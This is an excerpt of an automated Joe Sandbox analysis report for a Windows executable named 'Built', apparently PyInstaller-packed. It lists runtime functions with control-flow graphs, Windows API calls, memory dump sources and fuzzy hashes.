                                                                                                                                                                                                                                                        control_flow_graph 691 7ff65e29ba5c-7ff65e29ba82 692 7ff65e29ba84-7ff65e29ba98 call 7ff65e294ee8 call 7ff65e294f08 691->692 693 7ff65e29ba9d-7ff65e29baa1 691->693 707 7ff65e29be8e 692->707 695 7ff65e29be77-7ff65e29be83 call 7ff65e294ee8 call 7ff65e294f08 693->695 696 7ff65e29baa7-7ff65e29baae 693->696 715 7ff65e29be89 call 7ff65e29a8e0 695->715 696->695 698 7ff65e29bab4-7ff65e29bae2 696->698 698->695 701 7ff65e29bae8-7ff65e29baef 698->701 704 7ff65e29baf1-7ff65e29bb03 call 7ff65e294ee8 call 7ff65e294f08 701->704 705 7ff65e29bb08-7ff65e29bb0b 701->705 704->715 710 7ff65e29bb11-7ff65e29bb17 705->710 711 7ff65e29be73-7ff65e29be75 705->711 713 7ff65e29be91-7ff65e29bea8 707->713 710->711 712 7ff65e29bb1d-7ff65e29bb20 710->712 711->713 712->704 716 7ff65e29bb22-7ff65e29bb47 712->716 715->707 719 7ff65e29bb49-7ff65e29bb4b 716->719 720 7ff65e29bb7a-7ff65e29bb81 716->720 722 7ff65e29bb72-7ff65e29bb78 719->722 723 7ff65e29bb4d-7ff65e29bb54 719->723 724 7ff65e29bb83-7ff65e29bb8f call 7ff65e29d5fc 720->724 725 7ff65e29bb56-7ff65e29bb6d call 7ff65e294ee8 call 7ff65e294f08 call 7ff65e29a8e0 720->725 727 7ff65e29bbf8-7ff65e29bc0f 722->727 723->722 723->725 732 7ff65e29bb94-7ff65e29bbab call 7ff65e29a948 * 2 724->732 756 7ff65e29bd00 725->756 730 7ff65e29bc11-7ff65e29bc19 727->730 731 7ff65e29bc8a-7ff65e29bc94 call 7ff65e2a391c 727->731 730->731 736 7ff65e29bc1b-7ff65e29bc1d 730->736 744 7ff65e29bd1e 731->744 745 7ff65e29bc9a-7ff65e29bcaf 731->745 752 7ff65e29bbc8-7ff65e29bbf3 call 7ff65e29c284 732->752 753 7ff65e29bbad-7ff65e29bbc3 call 7ff65e294f08 call 7ff65e294ee8 732->753 736->731 740 7ff65e29bc1f-7ff65e29bc35 736->740 740->731 741 7ff65e29bc37-7ff65e29bc43 740->741 741->731 746 7ff65e29bc45-7ff65e29bc47 741->746 748 7ff65e29bd23-7ff65e29bd43 ReadFile 744->748 745->744 750 7ff65e29bcb1-7ff65e29bcc3 GetConsoleMode 745->750 746->731 751 7ff65e29bc49-7ff65e29bc61 746->751 754 7ff65e29bd49-7ff65e29bd51 748->754 755 7ff65e29be3d-7ff65e29be46 GetLastError 748->755 750->744 757 7ff65e29bcc5-7ff65e29bccd 750->757 751->731 759 7ff65e29bc63-7ff65e29bc6f 751->759 752->727 753->756 754->755 761 7ff65e29bd57 754->761 764 7ff65e29be63-7ff65e29be66 755->764 765 7ff65e29be48-7ff65e29be5e call 7ff65e294f08 call 7ff65e294ee8 755->765 758 7ff65e29bd03-7ff65e29bd0d call 7ff65e29a948 756->758 757->748 763 7ff65e29bccf-7ff65e29bcf1 ReadConsoleW 757->763 758->713 759->731 768 7ff65e29bc71-7ff65e29bc73 759->768 772 7ff65e29bd5e-7ff65e29bd73 761->772 774 7ff65e29bcf3 GetLastError 763->774 775 7ff65e29bd12-7ff65e29bd1c 763->775 769 7ff65e29bcf9-7ff65e29bcfb call 7ff65e294e7c 764->769 770 7ff65e29be6c-7ff65e29be6e 764->770 765->756 768->731 778 7ff65e29bc75-7ff65e29bc85 768->778 769->756 770->758 772->758 780 7ff65e29bd75-7ff65e29bd80 772->780 774->769 775->772 778->731 784 7ff65e29bd82-7ff65e29bd9b call 7ff65e29b674 780->784 785 7ff65e29bda7-7ff65e29bdaf 780->785 793 7ff65e29bda0-7ff65e29bda2 784->793 788 7ff65e29bdb1-7ff65e29bdc3 785->788 789 7ff65e29be2b-7ff65e29be38 call 7ff65e29b4b4 785->789 790 7ff65e29be1e-7ff65e29be26 788->790 791 7ff65e29bdc5 788->791 789->793 790->758 794 7ff65e29bdca-7ff65e29bdd1 791->794 793->758 796 7ff65e29bdd3-7ff65e29bdd7 794->796 797 7ff65e29be0d-7ff65e29be18 794->797 798 7ff65e29bdf3 796->798 799 7ff65e29bdd9-7ff65e29bde0 796->799 797->790 801 7ff65e29bdf9-7ff65e29be09 798->801 799->798 800 7ff65e29bde2-7ff65e29bde6 799->800 800->798 802 7ff65e29bde8-7ff65e29bdf1 800->802 801->794 803 7ff65e29be0b 801->803 802->801 803->790
                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                        • Source File: 00000004.00000002.2174153535.00007FF65E281000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FF65E280000, based on PE: true
                                                                                                                                                                                                                                                        • Associated: 00000004.00000002.2174130481.00007FF65E280000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000004.00000002.2174187963.00007FF65E2AB000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000004.00000002.2174217569.00007FF65E2BE000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000004.00000002.2174217569.00007FF65E2C1000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000004.00000002.2174268007.00007FF65E2C4000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_4_2_7ff65e280000_Built.jbxd
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID: _invalid_parameter_noinfo
                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                        • API String ID: 3215553584-0
                                                                                                                                                                                                                                                        • Opcode ID: fe76644ed600cf537c3c6f178a4f6dddc7bb94aee2e0e4a7e52e493d4ee37ba5
                                                                                                                                                                                                                                                        • Instruction ID: 3b3a9a25816a944e00a5cd0b7f45dcc2abe5ed9bd6c8b1f912fbded14ea25787
                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: fe76644ed600cf537c3c6f178a4f6dddc7bb94aee2e0e4a7e52e493d4ee37ba5
                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 32C10522A0CB8691EE609B1597402BD3B56FBA1BC0F5D2131FA4EE3799CE7CE4858714
                                                                                                                                                                                                                                                        Function 00007FF65E286360 Relevance: 10.6, APIs: 1, Strings: 6, Instructions: 82COMMON
                                                                                                                                                                                                                                                        Download Yara Rule

                                                                                                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                        • Source File: 00000004.00000002.2174153535.00007FF65E281000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FF65E280000, based on PE: true
                                                                                                                                                                                                                                                        • Associated: 00000004.00000002.2174130481.00007FF65E280000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000004.00000002.2174187963.00007FF65E2AB000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000004.00000002.2174217569.00007FF65E2BE000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000004.00000002.2174217569.00007FF65E2C1000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000004.00000002.2174268007.00007FF65E2C4000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_4_2_7ff65e280000_Built.jbxd
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID: CurrentProcess
                                                                                                                                                                                                                                                        • String ID: Failed to load Python DLL '%ls'.$LoadLibrary$Path of Python shared library (%s) and its name (%s) exceed buffer size (%d)$Path of ucrtbase.dll (%s) and its name exceed buffer size (%d)$Reported length (%d) of Python shared library name (%s) exceeds buffer size (%d)$ucrtbase.dll
                                                                                                                                                                                                                                                        • API String ID: 2050909247-2434346643
                                                                                                                                                                                                                                                        • Opcode ID: 111e0a7e53993944da2df5d9c96cd3a7cea32e86f931b773c4ccd6a62d35c348
                                                                                                                                                                                                                                                        • Instruction ID: 2ff8d0a668d60eb5aca531fad8723a08db9fd662d9ccfdace69f2d30cebf22c5
                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 111e0a7e53993944da2df5d9c96cd3a7cea32e86f931b773c4ccd6a62d35c348
                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 9F417C21A1C78691EE25DB20E7151E97361FB64344F884132FA5DA369EEF7CE509C740
                                                                                                                                                                                                                                                        Function 00007FF65E295628 Relevance: 6.1, APIs: 4, Instructions: 90fileCOMMON
                                                                                                                                                                                                                                                        Download Yara Rule

                                                                                                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                        • Source File: 00000004.00000002.2174153535.00007FF65E281000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FF65E280000, based on PE: true
                                                                                                                                                                                                                                                        • Associated: 00000004.00000002.2174130481.00007FF65E280000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000004.00000002.2174187963.00007FF65E2AB000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000004.00000002.2174217569.00007FF65E2BE000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000004.00000002.2174217569.00007FF65E2C1000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000004.00000002.2174268007.00007FF65E2C4000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_4_2_7ff65e280000_Built.jbxd
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID: CloseCreateFileHandle_invalid_parameter_noinfo
                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                        • API String ID: 1279662727-0
                                                                                                                                                                                                                                                        • Opcode ID: b1746a8a916bbf96797ffba89da9809a683c49b2a7b1d8f7dd6efe5c63c8eb6a
                                                                                                                                                                                                                                                        • Instruction ID: abfcec0c1eccae45def0ec14e285701159a39fc1a6af7c93d519b1c65f2ca903
                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: b1746a8a916bbf96797ffba89da9809a683c49b2a7b1d8f7dd6efe5c63c8eb6a
                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 74418322E5878183EB508B2197503797360FFA47A4F14A339FA9C93AD9DF7CA5E08710
                                                                                                                                                                                                                                                        Function 00007FF65E28CC3C Relevance: 4.6, APIs: 3, Instructions: 94COMMON
                                                                                                                                                                                                                                                        Download Yara Rule

                                                                                                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                        • Source File: 00000004.00000002.2174153535.00007FF65E281000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FF65E280000, based on PE: true
                                                                                                                                                                                                                                                        • Associated: 00000004.00000002.2174130481.00007FF65E280000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000004.00000002.2174187963.00007FF65E2AB000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000004.00000002.2174217569.00007FF65E2BE000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000004.00000002.2174217569.00007FF65E2C1000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000004.00000002.2174268007.00007FF65E2C4000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_4_2_7ff65e280000_Built.jbxd
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID: __scrt_acquire_startup_lock__scrt_dllmain_crt_thread_attach__scrt_get_show_window_mode__scrt_release_startup_lock
                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                        • API String ID: 3251591375-0
                                                                                                                                                                                                                                                        • Opcode ID: b3dd18574e8b698ea28c35ed35ed65a6730a16d6ac14c38d0a8ba428da0d66bc
                                                                                                                                                                                                                                                        • Instruction ID: 8f88573af3c10fcc84ea9442cc27f9188a21e52087fdf66bad6a8a81d67caf13
                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: b3dd18574e8b698ea28c35ed35ed65a6730a16d6ac14c38d0a8ba428da0d66bc
                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 2A310721E4C24641FE64AB659B623B93681AF71784F4C5034FA0EF72DFDE6DA844C202
                                                                                                                                                                                                                                                        Function 00007FF65E29013C Relevance: 3.2, APIs: 2, Instructions: 177COMMONLIBRARYCODE
                                                                                                                                                                                                                                                        Download Yara Rule

                                                                                                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                                                                                                        • Executed
                                                                                                                                                                                                                                                        • Not Executed
                                                                                                                                                                                                                                                        control_flow_graph 1296 7ff65e29013c-7ff65e290169 1297 7ff65e290185 1296->1297 1298 7ff65e29016b-7ff65e29016e 1296->1298 1300 7ff65e290187-7ff65e29019b 1297->1300 1298->1297 1299 7ff65e290170-7ff65e290173 1298->1299 1301 7ff65e290175-7ff65e29017a call 7ff65e294f08 1299->1301 1302 7ff65e29019c-7ff65e29019f 1299->1302 1314 7ff65e290180 call 7ff65e29a8e0 1301->1314 1304 7ff65e2901af-7ff65e2901b3 1302->1304 1305 7ff65e2901a1-7ff65e2901ad 1302->1305 1306 7ff65e2901b5-7ff65e2901bf call 7ff65e2aa4d0 1304->1306 1307 7ff65e2901c7-7ff65e2901ca 1304->1307 1305->1304 1308 7ff65e2901da-7ff65e2901e3 1305->1308 1306->1307 1307->1301 1311 7ff65e2901cc-7ff65e2901d8 1307->1311 1312 7ff65e2901e5-7ff65e2901e8 1308->1312 1313 7ff65e2901ea 1308->1313 1311->1301 1311->1308 1316 7ff65e2901ef-7ff65e29020e 1312->1316 1313->1316 1314->1297 1318 7ff65e290214-7ff65e290222 1316->1318 1319 7ff65e290355-7ff65e290358 1316->1319 1320 7ff65e290224-7ff65e29022b 1318->1320 1321 7ff65e29029a-7ff65e29029f 1318->1321 1319->1300 1320->1321 1324 7ff65e29022d 1320->1324 1322 7ff65e2902a1-7ff65e2902ad 1321->1322 1323 7ff65e29030c-7ff65e29030f call 7ff65e29beac 1321->1323 1328 7ff65e2902af-7ff65e2902b6 1322->1328 1329 7ff65e2902b9-7ff65e2902bf 1322->1329 1333 7ff65e290314-7ff65e290317 1323->1333 1326 7ff65e290380 1324->1326 1327 7ff65e290233-7ff65e29023d 1324->1327 1332 7ff65e290385-7ff65e290390 1326->1332 1331 7ff65e29035d-7ff65e290361 1327->1331 1334 7ff65e290243-7ff65e290249 1327->1334 1328->1329 1330 7ff65e2902c5-7ff65e2902e2 call 7ff65e29a47c call 7ff65e29ba5c 1329->1330 1329->1331 1356 7ff65e2902e7-7ff65e2902e9 1330->1356 1336 7ff65e290370-7ff65e29037b call 7ff65e294f08 1331->1336 1337 7ff65e290363-7ff65e29036b call 7ff65e2aa4d0 1331->1337 1332->1300 1333->1332 1338 7ff65e290319-7ff65e29031c 1333->1338 1339 7ff65e290281-7ff65e290295 1334->1339 1340 7ff65e29024b-7ff65e29024e 1334->1340 1336->1314 1337->1336 1338->1331 1346 7ff65e29031e-7ff65e290335 1338->1346 1347 7ff65e29033c-7ff65e290347 1339->1347 1342 7ff65e290250-7ff65e290256 1340->1342 1343 7ff65e29026c-7ff65e290277 call 7ff65e294f08 call 7ff65e29a8e0 1340->1343 1348 7ff65e290262-7ff65e290267 call 7ff65e2aa4d0 1342->1348 1349 7ff65e290258-7ff65e290260 call 7ff65e2a9e30 1342->1349 1362 7ff65e29027c 1343->1362 1346->1347 1347->1318 1353 7ff65e29034d 1347->1353 1348->1343 1349->1362 1353->1319 1359 7ff65e2902ef 1356->1359 1360 7ff65e290395-7ff65e29039a 1356->1360 1359->1326 1363 7ff65e2902f5-7ff65e29030a 1359->1363 1360->1332 1362->1339 1363->1347
                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                        • Source File: 00000004.00000002.2174153535.00007FF65E281000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FF65E280000, based on PE: true
                                                                                                                                                                                                                                                        • Associated: 00000004.00000002.2174130481.00007FF65E280000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000004.00000002.2174187963.00007FF65E2AB000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000004.00000002.2174217569.00007FF65E2BE000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000004.00000002.2174217569.00007FF65E2C1000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000004.00000002.2174268007.00007FF65E2C4000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_4_2_7ff65e280000_Built.jbxd
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID: _invalid_parameter_noinfo
                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                        • API String ID: 3215553584-0
                                                                                                                                                                                                                                                        • Opcode ID: 2fd4b9cf4e2c203a215f80a0453bc9b94d2a0e119ef729a2f51343e3c0f92604
                                                                                                                                                                                                                                                        • Instruction ID: 82982899e2f7472e2de185292d1da54c25d4651a48abe4ff1f0fbde8bcf0906a
                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 2fd4b9cf4e2c203a215f80a0453bc9b94d2a0e119ef729a2f51343e3c0f92604
                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: C4512661B0924986EF249E259700A7A7291AF60BA4F0C6634FD7CE37CDCE3CE4808606
                                                                                                                                                                                                                                                        Function 00007FF65E29C134 Relevance: 3.0, APIs: 2, Instructions: 46COMMONLIBRARYCODE
                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                        • Source File: 00000004.00000002.2174153535.00007FF65E281000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FF65E280000, based on PE: true
                                                                                                                                                                                                                                                        • Associated: 00000004.00000002.2174130481.00007FF65E280000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000004.00000002.2174187963.00007FF65E2AB000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000004.00000002.2174217569.00007FF65E2BE000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000004.00000002.2174217569.00007FF65E2C1000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000004.00000002.2174268007.00007FF65E2C4000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_4_2_7ff65e280000_Built.jbxd
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID: ErrorFileLastPointer
                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                        • API String ID: 2976181284-0
                                                                                                                                                                                                                                                        • Opcode ID: 7d52f85de62641260209e8dbb28c5e1251e01e8bf24b4306ce9dcd9badf2c9c6
                                                                                                                                                                                                                                                        • Instruction ID: ac8a5fb4ccc9e17118baaf58dc0298b0c84d4ac98d5e0341e74d6dd2e2f5c245
                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 7d52f85de62641260209e8dbb28c5e1251e01e8bf24b4306ce9dcd9badf2c9c6
                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 6911DD22608A8181DE208B25AB40069B361AB61BF0F5C1331FA7D9B7EDCE78D0808700
                                                                                                                                                                                                                                                        Function 00007FF65E29AB58 Relevance: 2.6, APIs: 2, Instructions: 59COMMON
                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                        • CloseHandle.KERNEL32(?,?,?,00007FF65E29A9D5,?,?,00000000,00007FF65E29AA8A), ref: 00007FF65E29ABC6
                                                                                                                                                                                                                                                        • GetLastError.KERNEL32(?,?,?,00007FF65E29A9D5,?,?,00000000,00007FF65E29AA8A), ref: 00007FF65E29ABD0
                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                        • Source File: 00000004.00000002.2174153535.00007FF65E281000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FF65E280000, based on PE: true
                                                                                                                                                                                                                                                        • Associated: 00000004.00000002.2174130481.00007FF65E280000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000004.00000002.2174187963.00007FF65E2AB000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000004.00000002.2174217569.00007FF65E2BE000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000004.00000002.2174217569.00007FF65E2C1000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000004.00000002.2174268007.00007FF65E2C4000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_4_2_7ff65e280000_Built.jbxd
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID: CloseErrorHandleLast
                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                        • API String ID: 918212764-0
                                                                                                                                                                                                                                                        • Opcode ID: ae1e15d82824e1a5fac1c7302ca2ff5641fe0b0e43db7728cd9339717749910c
                                                                                                                                                                                                                                                        • Instruction ID: 4d819c8bf71fcc0032d09beda254ae6bef654563870bfdf9c708a506b46b0d80
                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: ae1e15d82824e1a5fac1c7302ca2ff5641fe0b0e43db7728cd9339717749910c
                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: DE216251F1878241EEA45761979137936829FB47D4F0C6279F92EE7BDDCE6CE4C14200
                                                                                                                                                                                                                                                        Function 00007FFDA34311E0 Relevance: 1.7, APIs: 1, Instructions: 204COMMON
                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                        • Source File: 00000004.00000002.2198401846.00007FFDA3421000.00000040.00000001.01000000.00000012.sdmp, Offset: 00007FFDA3420000, based on PE: true
                                                                                                                                                                                                                                                        • Associated: 00000004.00000002.2197732045.00007FFDA3420000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000004.00000002.2198401846.00007FFDA3582000.00000040.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000004.00000002.2198401846.00007FFDA3584000.00000040.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000004.00000002.2198401846.00007FFDA3599000.00000040.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000004.00000002.2201370576.00007FFDA359B000.00000080.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000004.00000002.2201550477.00007FFDA359C000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_4_2_7ffda3420000_Built.jbxd
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID: InfoSystem
                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                        • API String ID: 31276548-0
                                                                                                                                                                                                                                                        • Opcode ID: 7e95180d38cd00ed8df76aa16efa4cdac9e9adb77db5b2022ed37012a1f49ff9
                                                                                                                                                                                                                                                        • Instruction ID: 3e4eedd719e1abed98be266b8c001ccaea46bb53e27681c3a2087d2a9685ebc6
                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 7e95180d38cd00ed8df76aa16efa4cdac9e9adb77db5b2022ed37012a1f49ff9
                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: D3A12C60B0FB4A86FE59DB59A87033422A2BF54B44F840535C90EB77A2DFBEE4519309
                                                                                                                                                                                                                                                        Function 00007FF65E29BEAC Relevance: 1.6, APIs: 1, Instructions: 112COMMONLIBRARYCODE
                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                        • Source File: 00000004.00000002.2174153535.00007FF65E281000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FF65E280000, based on PE: true
                                                                                                                                                                                                                                                        • Associated: 00000004.00000002.2174130481.00007FF65E280000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000004.00000002.2174187963.00007FF65E2AB000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000004.00000002.2174217569.00007FF65E2BE000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000004.00000002.2174217569.00007FF65E2C1000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000004.00000002.2174268007.00007FF65E2C4000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_4_2_7ff65e280000_Built.jbxd
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID: _invalid_parameter_noinfo
                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                        • API String ID: 3215553584-0
                                                                                                                                                                                                                                                        • Opcode ID: 5a303e376ae32d58fd1e52f1ac99a64fdc1cf63549abbe0bdd4da132c2ec767e
                                                                                                                                                                                                                                                        • Instruction ID: d7ff0fc84c63885f4ad9997c29539fd5777178999f6cbd563262bbf4002886c9
                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 5a303e376ae32d58fd1e52f1ac99a64fdc1cf63549abbe0bdd4da132c2ec767e
                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 8841D43291824587EE348B29A74427973A1EF65B81F182131F68ED36D9CF2CE482CB54
                                                                                                                                                                                                                                                        Function 00007FF65E287F90 Relevance: 1.6, APIs: 1, Instructions: 85COMMON
                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                        • Source File: 00000004.00000002.2174153535.00007FF65E281000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FF65E280000, based on PE: true
                                                                                                                                                                                                                                                        • Associated: 00000004.00000002.2174130481.00007FF65E280000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000004.00000002.2174187963.00007FF65E2AB000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000004.00000002.2174217569.00007FF65E2BE000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000004.00000002.2174217569.00007FF65E2C1000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000004.00000002.2174268007.00007FF65E2C4000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_4_2_7ff65e280000_Built.jbxd
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID: _fread_nolock
                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                        • API String ID: 840049012-0
                                                                                                                                                                                                                                                        • Opcode ID: 0748e9379ee1a24a6dd361f3a2547f707c71d81643cc4b02aa9d5a9a64da41ab
                                                                                                                                                                                                                                                        • Instruction ID: 14158abfd7d765aff35c4f521640649d5e5df173ef2cddfc1e3cef4ca73ece10
                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 0748e9379ee1a24a6dd361f3a2547f707c71d81643cc4b02aa9d5a9a64da41ab
                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 13219612B1C75646FE549A226B047BAB651BF65BC4FCC5470FE0DABB8ACEBDE041C200
                                                                                                                                                                                                                                                        Function 00007FF65E29B93C Relevance: 1.6, APIs: 1, Instructions: 79COMMONLIBRARYCODE
